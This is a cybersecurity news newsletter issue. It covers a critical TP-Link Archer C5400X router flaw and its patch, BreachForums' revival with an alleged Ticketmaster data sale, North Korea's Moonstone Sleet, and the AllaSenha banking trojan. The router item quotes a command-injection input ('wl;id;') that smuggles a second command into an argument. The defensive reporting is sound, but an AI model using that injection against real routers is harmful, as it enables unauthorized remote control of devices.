BreachForums is back

May 31 2024

.bh__table, .bh__table_header, .bh__table_cell { border: 1px solid #C0C0C0; }
.bh__table_cell { padding: 5px; background-color: #FFFFFF; }
.bh__table_cell p { color: #2D2D2D; font-family: ‘Helvetica’,Arial,sans-serif !important; overflow-wrap: break-word; }
.bh__table_header { padding: 5px; background-color:#F1F1F1; }
.bh__table_header p { color: #2A2A2A; font-family:’Trebuchet MS’,’Lucida Grande’,Tahoma,sans-serif !important; overflow-wrap: break-word; }

Gone Phishing Banner

Welcome to Gone Phishing, your daily cybersecurity newsletter thatโ€™s blowing up like a vindaloo ๐Ÿ’ฅ๐Ÿ’ฅ๐Ÿ’ฅ

Itโ€™s Friday, folks, which can only mean one thingโ€ฆ Itโ€™s time for our weekly segment!

It goes by many names. Patch of the Week, Tweak of the week. Okay, thatโ€™s it.

Congrats, the cybercriminals are no matchโ€ฆ for your patch! ๐Ÿฉน๐Ÿฉน๐Ÿฉน

Game on ๐ŸŽฎ๐Ÿ•น๏ธ๐Ÿ‘พ

โš ๏ธ Urgent Update: Critical Security Flaw in TP-Link Archer C5400X Router ๐Ÿšจ

A maximum-severity vulnerability (CVE-2024-5035, CVSS 10.0) in the TP-Link Archer C5400X gaming router has been disclosed, allowing remote code execution via specially crafted requests. ๐Ÿ’ฅ The flaw impacts all firmware versions up to 1_1.1.6 and has been patched in version 1_1.1.7, released on May 24, 2024. ๐Ÿ› ๏ธ

Exploit Details ๐Ÿ“

โ—ย The flaw resides in the "rftest" binary, which exposes a network listener on TCP ports 8888, 8889, and 8890.

โ—ย Attackers can bypass command restrictions by injecting shell meta-characters (e.g., "wl;id;") to gain arbitrary command execution with elevated privileges.

Patch Information ๐Ÿฉน

The new firmware version 1_1.1.7 Build 20240510 mitigates the issue by discarding commands containing special characters.

Security Advice ๐Ÿ›ก๏ธ

Update your TP-Link Archer C5400X router to the latest firmware immediately to protect against potential exploitation.

This fix is critical to prevent remote unauthenticated attackers from gaining control over your device.

Background ๐Ÿž๏ธ

The flaw was discovered by German cybersecurity firm ONEKEY, emphasising the importance of securing wireless device configuration APIs.

The disclosure follows recent vulnerabilities in other networking devices, highlighting ongoing security challenges.

Now, on to todayโ€™s hottest cybersecurity news stories:

  • ๐Ÿ’ฌ BreachForums is back with a brand new agenda ๐Ÿ†•

  • ๐ŸŒ™ Introducing Moonstone Sleet, N. Korea's latest ๐Ÿฅก

  • ๐Ÿง Brazilian banks hit with AllaKore variant = AllaSenha ๐Ÿ‘จโ€๐Ÿ’ป

Breach, Breach; itโ€™s the sound of da police ๐Ÿšจ๐Ÿ‘ฎ๐Ÿš”

๐Ÿšจ BreachForums Bounces Back! ๐Ÿ‘‹๐Ÿป

Just two weeks after a major U.S. law enforcement takedown, the notorious BreachForums is back in action at breachforums[.]st! ๐Ÿš€ The revival was announced by ShinyHunters, who is now selling a massive 1.3 TB database of 560 million Ticketmaster customers for $500,000. ๐Ÿ˜ฒ

What's Inside? ๐Ÿ“ฆ

The database allegedly contains:

โ—ย Full names, addresses, email addresses, phone numbers

โ—ย Ticket sales and event info

โ—ย Last four digits of credit cards and expiration dates ๐Ÿ’ณ

Sign-Up Required! โš ๏ธ

Visitors now need to sign up for an account to view content. ๐Ÿ“

Law Enforcement Strikes ๐Ÿ‘ฎ

Earlier, U.S. authorities dismantled BreachForums and seized its domains (.st/.cx/.is/.vc) and Baphometโ€™s Telegram channel. The FBI is reviewing backend data. ๐Ÿ•ต๏ธโ€โ™‚๏ธ

Who's Behind It? ๐Ÿ‘ค

It's unclear if the current ShinyHunters is the original hacker. The domain was reportedly reclaimed from NiceNIC. Is it a honeypot? Cybersecurity experts are sceptical. ๐Ÿค”

A Brief History ๐Ÿ“œ

BreachForums rose in March 2022 post-RaidForums' shutdown and re-emerged in mid-June 2023 after another takedown. The DoJ and FBI have yet to comment on the latest developments. ๐Ÿ•ถ๏ธ

Stay tuned for more updates on this unfolding cyber drama! ๐ŸŒ

Hackers: Fly me to the Moonstone ๐Ÿ’€๐Ÿ’€๐Ÿ’€

๐Ÿšจ New North Korean Cyber Threat: Moonstone Sleet Strikes! ๐ŸŒ™

A new North Korean cyber threat actor, Moonstone Sleet, is targeting software, IT, education, and defence sectors with sophisticated ransomware and malware. ๐Ÿš€ This group is closely linked to the infamous Lazarus Group.

Deceptive Tactics ๐ŸŽญ

Moonstone Sleet sets up fake companies and job offers, using trojanized tools, malicious games, and custom ransomware. They employ both tried-and-true and unique methods to achieve their goals. ๐ŸŽญ

Fake Jobs and Malicious Tools ๐Ÿ› ๏ธ

โ—ย Fake job offers and companies lure targets in

โ—ย Trojanized tools like modified PuTTY drop malicious payloads

โ—ย Malicious npm packages delivered through LinkedIn and freelancing sites ๐Ÿง‘โ€๐Ÿ’ป

Dangerous Malware ๐Ÿ‘พ

Their attacks involve:

โ—ย Custom ransomware FakePenny

โ—ย Malicious game DeTankWar with embedded malware loaders ๐ŸŽฎ

โ—ย Credential theft from the Windows LSASS process ๐Ÿ›ก๏ธ

Unique Strategies โ™Ÿ๏ธ

Moonstone Sleet creates fake companies (e.g., C.C. Waterfall, StarGlow Ventures) to approach targets, often posing as blockchain or software development firms. Emails often include tracking pixels to gauge interest. ๐Ÿ“ง

Recent Attacks โš”๏ธ

Recent campaigns include targeting defence companies with ransomware demanding $6.6 million in Bitcoin. Microsoft urges vigilance against supply chain attacks. ๐Ÿ’ผ

Evolving Threat ๐Ÿ’

Moonstone Sleetโ€™s tactics have evolved from other North Korean threat actors, demonstrating their growing sophistication and ambition. Stay alert and secure! ๐Ÿšจ

๐ŸŽฃ Catch of the Day!! ๐ŸŒŠ๐ŸŸ๐Ÿฆž

Stay ahead of the curve with Presspool.ai! ๐Ÿš€ Subscribe to their newsletter for the latest buzz in the information technology space, with a special focus on AI. Their slogan says it all: "Actionable marketing insights for the visionary AI executive." ๐Ÿค“๐Ÿ’ก Thatโ€™s us, alright! ๐Ÿคต How about you? Visionary AI executive, much? ๐Ÿ‘€

And if the newsletter gets your motor running then you can take a butchers at their cool AI marketing product too which is sure to help you make the most of our new artificial overlords and put them to work for your business ๐Ÿค–๐Ÿ‘ฉโ€๐Ÿ’ป๐ŸŒ

Rest assured, the process is very straightforward.

You simply:

๐Ÿ†• Sign Up & Create Campaign

๐Ÿ“Š Define your audience, budget, and message to captivate your audience.

๐Ÿš€ Launch your campaign, as Presspoolโ€™s AI matches it with ideal newsletter audiences for optimal reach and conversions. ๐ŸŽฏ

๐Ÿ•ต๏ธ Finally, you leverage real-time analytics to track performance and refine future strategies. ๐Ÿ“ˆ Elevate your marketing game and stay informed with Presspool.ai! ๐ŸŒŸ Simples! ๐Ÿฆฆ

Presspool.aiย ๐Ÿ“ฐ๐ŸŠ๐Ÿค– may just have what you need to succeed. And if the product isnโ€™t for you, the newsletter alone is a gamechanger. And we know newsletters ๐Ÿ˜‰

An inconvenient struth: Forget Al Gore; meet AllaKore ๐Ÿ˜ฌ๐Ÿ˜ฌ๐Ÿ˜ฌ

๐Ÿšจ Brazilian Banks Under Cyber Attack by AllaSenha! ๐Ÿ•‹

Brazilian banks are facing a new cyber threat: a custom variant of the AllaKore RAT called AllaSenha. This malware targets banking credentials using Azure cloud for command-and-control. ๐Ÿฆ

Whoโ€™s at Risk? โ“

Targets include major banks like Banco do Brasil, Bradesco, Itaรบ Unibanco, and more. The attack likely starts with phishing messages containing malicious links. ๐Ÿ“ง

How It Works ๐Ÿ› ๏ธ

โ—ย LNK File Trick: A malicious shortcut file (NotaFiscal.pdf.lnk) is disguised as a PDF.

โ—ย BAT Payload: Launches a Base64-encoded PowerShell command.

โ—ย Python and DLL: Downloads Python, runs a script (BPyCode), and loads a DLL in memory. ๐Ÿ

Malicious Operations ๐Ÿ˜ˆ

AllaSenha steals credentials and captures 2FA codes using overlay windows. It can even trick users into scanning QR codes for fraudulent transactions. ๐Ÿ˜ฑ

Key Findings ๐Ÿ”‘

โ—ย Cloud C2: Uses Microsoft Azure Functions for flexible infrastructure.

โ—ย Portuguese-Speaking Developer: Likely linked to a user named bert1m.

โ—ย High Productivity: Latin American threat actors are prolific in cybercrime campaigns.

Wider Impact ๐ŸŒ

These attacks, while focusing on Latin America, often affect global companies. Malspam campaigns with banking trojans like Casbaneiro are also targeting financial data. ๐Ÿ“Š

Mobile Threats ๐Ÿ“ฑ

Not just Windows โ€“ Android banking trojan Anatsa infiltrated the Google Play Store, disguised as productivity apps, stealing banking credentials through overlays. ๐Ÿ“ฒ

Stay Vigilant! ๐Ÿ‘€

Protect your accounts and stay aware of phishing tactics. Cybersecurity measures are crucial to defending against these sophisticated attacks. ๐Ÿ›ก๏ธ

See you next week, cyber squad ๐Ÿฅ‚

๐Ÿ—ž๏ธ Extra, Extra! Read all about it! ๐Ÿ—ž๏ธ

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • ๐Ÿ›ก๏ธ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday ๐Ÿ“…

  • ๐Ÿ’ตย Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for ๐Ÿ†“

  • ๐Ÿ“ˆย Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future ๐Ÿ‘พ

Let us know what you think.

So long and thanks for reading all the phish!

footer graphic cyber security newsletter

Recent articles